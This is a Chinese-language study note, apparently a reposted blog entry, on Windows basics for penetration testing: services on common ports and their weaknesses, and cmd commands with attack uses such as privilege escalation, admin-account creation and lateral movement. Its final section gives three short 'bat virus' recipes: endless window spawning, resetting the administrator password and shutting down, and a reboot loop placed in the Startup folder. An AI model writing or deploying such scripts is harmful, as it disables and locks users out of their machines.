【windows基础篇】windows(2)

以下笔记学习来自B站泷羽Sec:
B站泷羽Sec

1.常见端口对应服务

ftp 21: 文件传输协议,可能存在缓冲区溢出漏洞,暴力破解
telnet 23:远程终端协议,可以使用一些远程连接工具做一些弱口令的爆破
web 80(80-89都有可能是web):TCP(传输控制协议)和 UDP(用户数据报协议)协议中的一个端口号。可能出现DDoS(分布式拒绝服务)攻击等。
443:互联网上用于超文本传输安全协议(HTTPS)服务的默认端口。可能出现ssl心脏滴血漏洞以及web漏洞测试。可能出现中间人攻击漏洞等
smb 445:Server Message Block,是一种网络文件共享协议,它允许网络上的计算机相互访问共享的文件、打印机等资源。可能出现恶意文件注入与执行,远程控制漏洞
mssql 1433:Microsoft SQL Server 数据库管理系统的默认端口。可能出现弱口令,sql注入漏洞等。
oracle 1521:Oracle 数据库监听器的默认端口。可能出现暴力破解,sql注入漏洞等。
2082/2083 cpanel:主机管理登录系统(国外居多)。可能出现XSS,弱口令漏洞等。
2222 :虚拟主机管理登录系统
3218:squid代理默认端口-漫游内网
3306 mysql:数据库管理系统的默认端口。可能出现弱口令,SQL注入漏洞等
3312/3311:kangle主机管理系统登录
3389:Windows 远程桌面(RDP)的服务端口,可能出现远程代码执行漏洞
5432:postgreSQL数据库默认监听端口,可能出现SQL注入,未授权等漏洞
5900:虚拟网络计算(vnc),可能有弱口令或者暴力破解漏洞
6379:redis,可能出现未授权,远程代码执行漏洞
7001/7002:weblogic,可能出现默认弱口令,反序列化等漏洞
7778:kloxo,主机控制面板登录,可能出现Oracle应用服务器漏洞
8000-9090:一些常见的web端口,有些运维喜欢把管理后台开到这些非80端口上面
8080:tomcat,wdcp主机管理系统,可能存在默认弱口令漏洞
8080,8089,9090:jboss
8083:vestacp,主机管理系统
8649:ganglia,Ganglia 是一个开源的集群监视项目,主要用于监控系统性能,如 CPU、内存、硬盘利用率、I/O 负载、网络流量情况等。可能出现未授权,信息泄露漏洞等
8888:宝塔,主机管理默认端口,一款在服务器管理领域广泛使用的服务器运维管理软件。它提供了便捷的可视化操作界面,让用户可以轻松地对服务器进行各种管理操作,比如网站搭建、数据库管理、文件管理、服务器性能监控等等。无论是个人开发者搭建小型网站,还是企业运维人员管理服务器集群,宝塔面板都能在一定程度上简化操作流程,提高工作效率。
10000:virtuamin/webmin服务器虚拟主机管理系统,可能出现未授权,远程代码执行等漏洞
11211:memcache,Memcached 是一个高性能的分布式内存对象缓存系统,用于通过减轻数据库负载来加速动态 Web 应用程序。可能出现缓存投毒,未授权等漏洞
27017/27018:mongodb数据库,可能出现未授权漏洞
28071:mongodb,统计系统页面

2. cmd命令

2.1 echo

查看echo帮助的提示

echo /?

输出文本

echo 文本

输出文本并重定向到1.txt文件中

echo 文本 > 1.txt

把文本追加到1.txt中

echo 文本 >> 1.txt

如果再用一次就会把原先文件内的文本覆盖掉

2.2 切换文件夹

展示当前目录下的文件

dir

切换到指定盘符

D:   C:

进入到当前目录

cd .

回退到上一级目录

cd ..

2.3 tree文件树状图

/f:显示每个文件夹中的名称
/a:使用ascii字符显示,而不使用扩展字符(可以有效解决乱码)
在渗透测试中比较常用

2.4 md创建目录和rd删除目录

md是mkdir的缩写,作用一样
创建一个名为111的文件夹

mk 111

删除111文件夹

rd 111

tab有补全功能

2.5 ipconfig

显示当前的网络状态,IP配置,一般用这个命令查看网络本机IP地址,排查网络问题
把所有本机的网络信息打印出来

ipconfig /all

2.6 cls

清屏

2.7 copy 复制拼接文件

把文件1.txt复制到上一级目录

copy 1.txt ..\1.txt

把admin文件夹中的1.txt复制到桌面并重命名为2.txt

copy amdin\1.txt Desktop\2.txt

把1.txt中的内容和2.txt的内容拼接起来,并重定向到3.txt中

copy 1.txt + 2.txt > 3.txt

2.8 move

把上一级目录中的1.txt移动到本级目录,并且重命名为4.txt

move ..\1.txt 4.txt

2.9 ren重命名

把1.txt重命名为2.txt

ren 1.txt 2.txt

2.10 del删除

删除1,2,3.txt

del 1.txt 2.txt 3.txt

!注:del命令所删除的文件是永久删除,不回进入回收站

2.11 ping

一般用于探测主机ip是否存活
一直ping

ping ip -t

2.12 type

显示文本文件的内容

type 1.txt

2.13 reg

用于操作 Windows 注册表的一个重要工具

2.14 nslookup

用于探测域名信息

nslookup www.baidu.com

查看历史解析记录

nslookup -d www.baidu.com

2.15 find查找

在1.txt中查找带a的字段

find "a" 1.txt

查找a参数字段并排序行号

find /n "a" 1.txt

可以将type与find结合使用
查看1.txt的内容并输出带有a参数的字段并排序行号

type 1.txt | find /n "a"

2.16 tasklist任务列表

显示当前的进程名称等信息

2.17 taskkill

用于杀死进程
常用参数一般是-pid,-f,-t
例如:首先开启一个计算器进程,使用taskkill杀死计算器进程
假如遇见杀不掉的进程加一个-f即可

2.18 ver,winver显示版本

ver会在cmd上显示版本信息
winver会弹出一个窗口显示版本信息

2.19 start启动开始命令

启动计算器

start calc

启动ping并执行-t参数

start ping www.baidu.com -t

2.20 systeminfo

查看整个系统的信息
用于查看一些比较重要的信息,比如说补丁信息,后期在提权过程中就是针对一些不同的修补程序进行一个提权,例如它少打了哪些补丁就可以利用少打的补丁进行提权。(溢出系统提权)

2.11 logoff注销

后期提权成功的情况下要远程登录3389桌面的话,有可能有的机器是连接状态,可以利用这个命令把对方的远程登录注销掉(这个是暴力方式,也可以用其他的方法挤掉对方)

2.22 shutdown

/s 在一分钟内关机
/a 计划取消
/r 重启
/g 在一分钟内关机
/r /t 0 /t用于设置时间,设置为0则为立即执行

2.23 telnet协议工具

要使用此工具需要:
控制面板——程序——打卡或关闭Windows功能——telnet客户端勾选
之后在cmd中输入telnet若进入该该工具则成功

2.24 arp地址解析协议

自己ip和物理机的映射关系表
若拿下一台内网机器通过这条命令可以查看当前内网有哪些主机以助于横向移动,用于发现同一网络中有哪些主机

arp -a

2.25 at定时任务

定时关机

at 时间 "shutdown /r /t 0"

取消命令

at 1 /delete

2.26 net服务

关闭telnet

net stop telnet

开启telnet

net start telnet

查看当前用户

net user

添加用户名为admin,密码为123的用户

net user admin 123 /add

查看admin用户权限

net user admin

查看管理员用户权限

net user administrator

怎么把admin变成管理员权限

net localgroup administrator admin /add(提权)

删除用户

net user admin /delete

3. 利用cmd编写bat病毒

3.1 资源耗尽病毒

echo start cmd > 1.txt
echo %0 >> 1.txt //%0指点脚本本身,在此处就会无限启动本身,即无限启动cmd窗口
ren 1.txt 1.bat

3.2 锁机病毒

echo net user administrator 123456 > c:\windows\Temp\1.bat
echo shutdown /n /t 0 >> c:\windows\Temp\1.bat

3.3 无限重启病毒

echo shutdown /n /t 0 > c:\windows\Temp\1.bat
copy c:\windows\Temp\1.bat “%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup”

“%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup”
是开机自启目录

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/16480.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

STM32 ADC --- DMA采样

STM32 ADC — DMA采样 文章目录 STM32 ADC --- DMA采样cubeMX配置重要 :cubeMX配置使用DMA时的一个问题 代码编写一维数组接收数据二维数组接收数据 使用cubeMX生成HAL工程 cubeMX配置 上面红框中选择配置为连续转换模式,即通过HAL_ADC_Start_DMA()函数…

【WPF】Prism学习(二)

Prism Commands 1.命令(Commanding) 1.1. ViewModel的作用: ViewModel不仅提供在视图中显示或编辑的数据,还可能定义一个或多个用户可以执行的动作或操作。这些用户可以通过用户界面(UI)执行的动作或操作…

两部手机的IP地址:是否会相同?全面探讨

在数字化时代,手机已成为我们生活中不可或缺的一部分,而IP地址作为手机连接互联网的重要标识,扮演着举足轻重的角色。许多用户可能会好奇,两部手机在连接网络时,它们的IP地址是否会相同?这个问题看似简单&a…

【代码随想录day31】【C++复健】56. 合并区间;738.单调递增的数字

56. 合并区间 遇到了三个问题,一一说来: 1 比较应该按左区间排序,我却写了右区间。由于本题是合并区间,判断是否连续显然是用下一个的左区间与前一个的右区间比较,属于没想清楚了。 2 在写for循环时写成了如下的代码…

uniapp: 微信小程序包体积超过2M的优化方法

一、问题描述 在使用uniapp进行微信小程序开发时,经常会遇到包体积超过2M而无法上传: 二、解决方案 目前关于微信小程序分包大小有以下限制: 整个小程序所有分包大小不超过 30M(服务商代开发的小程序不超过 20M) 单个…

MySQL Online DDL

文章目录 1. 在线DDL的优势2. 支持的DDL操作3. 在线DDL的原理4. Online DDL的操作流程1. 准备阶段(Prepare phase)2. 拷贝阶段(Copy phase)3. 应用阶段(Apply phase)4. 替换阶段(Swap phase&…

【freertos】FreeRTOS时间管理

FreeRTOS时间管理 一、睡眠延时函数1、vTaskDelay2、vTaskDelayUntil3、相对延时与绝对延时对比 二、自定义延时函数1、微秒延时2、毫秒延时 一、睡眠延时函数 1、vTaskDelay \quad 在UCOSIII 中延时函数OSTimeDly()可以设置为三种模式:相对模式、周期模式和绝对模式。在FreeR…

栈相关算法题1|通过栈判断链表是否对称|共享栈入栈出栈|括号匹配|多种括号配对|递归求序列最大值(C)

通过栈判断链表是否对称 设单链表的表头指针为L,data域为字符型,判断该链表的全部n个字符是否中心对称 xyx,xyyx 算法思想 使用栈来判断链表中的数据是否中心对称,让链表的前一半元素依次进栈 在处理链表的后一半元素时&#x…

datawhale11月组队学习 模型压缩技术3:2:4结构稀疏化BERT模型

文章目录 一、 半结构化稀疏性简介二、 代码实践2.1 定义辅助函数2.2 加载模型、tokenizer和数据集2.3 测试baseline模型指标2.4 对BERT-base模型进行半结构稀疏化 《datawhale2411组队学习之模型压缩技术1:模型剪枝(上)》:介绍模…

Qt中实现旋转动画效果

使用QPropertyAnimation类绑定对应的属性后 就可以给这个属性设置对应的动画 //比如自定义了属性 Q_PROPERTY(int rotation READ rotation WRITE setRotation)//给这个属性加动画效果 //参数1:谁要加动画效果 //参数2:哪个属性加动画效果 //参数3&…

视频流媒体播放器EasyPlayer.js RTSP播放器视频颜色变灰色/渲染发绿的原因分析

EasyPlayer.js RTSP播放器属于一款高效、精炼、稳定且免费的流媒体播放器,可支持多种流媒体协议播放,无须安装任何插件,起播快、延迟低、兼容性强,使用非常便捷。 EasyPlayer.js播放器不仅支持H.264与H.265视频编码格式&#xff0…

SpringBoot+Vue3开发会议管理系统

1 项目介绍 会议管理系统,简化公司内会议方面的流程,提供便捷。实现对会议室的管理、会议的管理、会议预约的管理,三大主流程模块。 系统分为三种角色,分别是员工、管理员和超级管理员。 员工角色功能:查看会议室占…

前端 JS 实用操作总结

目录 1、重构解构 1、数组解构 2、对象解构 3、...展开 2、箭头函数 1、简写 2、this指向 3、没有arguments 4、普通函数this的指向 3、数组实用方法 1、map和filter 2、find 3、reduce 1、重构解构 1、数组解构 const arr ["唐僧", "孙悟空&quo…

Clip结合Faiss+Flask简易版文搜图服务

一、实现 使用目录结构&#xff1a; templates ---upload.html faiss_app.py 前端代码&#xff1a;upload.html <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name"viewport" content&quo…

【鸿蒙开发】第十一章 Stage模型应用组件-任务Mission

目录 1 任务(Mission)管理场景 2 任务&#xff08;Mission&#xff09;与启动模式 2.1 singleton单实例模式 2.2 multiton多实例模式 2.3 specified指定实例模式 3 页面栈及任务链 3.1 页面栈 3.2 任务链 4 设置任务快照的图标和名称 4.1 设置任务快照的图标&#xf…

探索 HTML 和 CSS 实现的模拟时钟

效果演示 这段代码是一个模拟时钟的 HTML 和 CSS 代码。它创建了一个简单的数字时钟界面&#xff0c;包括时针、分针和秒针。 HTML <div class"face"><p class"v-index">II</p><p class"h-index">II</p><d…

CSS预编译器:让样式编写更高效的秘密武器(6)

在现代前端开发中&#xff0c;CSS 预编译器是一种非常有用的工具&#xff0c;它通过扩展 CSS 语言的功能&#xff0c;帮助开发者更高效地编写和维护样式代码。本文将介绍 CSS 预编译器的基本原理&#xff0c;并重点讲解 LESS 的安装和使用方法。 1. 基本原理 编写 CSS 时&…

Vue3中实现插槽使用

目录 一、前言 二、插槽类型 三、示例 四、插槽的分类实现 1. 基本插槽 2. 命名插槽 3. 默认插槽内容 4. 作用域插槽&#xff08;Scoped Slots&#xff09; 5. 多插槽与具名插槽组合 一、前言 在 Vue 3 中&#xff0c;插槽&#xff08;Slot&#xff09;用于实现组件的内…

爬虫——Requests库的使用

在爬虫开发中&#xff0c;HTTP请求是与服务器进行交互的关键操作。通过发送HTTP请求&#xff0c;爬虫可以获取目标网页或接口的数据&#xff0c;而有效地处理请求和响应是爬虫能够高效且稳定运行的基础。Requests库作为Python中最常用的HTTP请求库&#xff0c;因其简洁、易用和…

如何使用EasyExcel生成多列表组合填充的复杂Excel示例

作者&#xff1a;Funky_oaNiu 一、&#xff08;需求&#xff09;生成的表格效果&#xff1a;二、搞一个模板文件三、建立对应的表格实体类四、开始填充五、Vue3前端发起请求下载六、官方文档及AI问答 一、&#xff08;需求&#xff09;生成的表格效果&#xff1a; 其中只有顶部…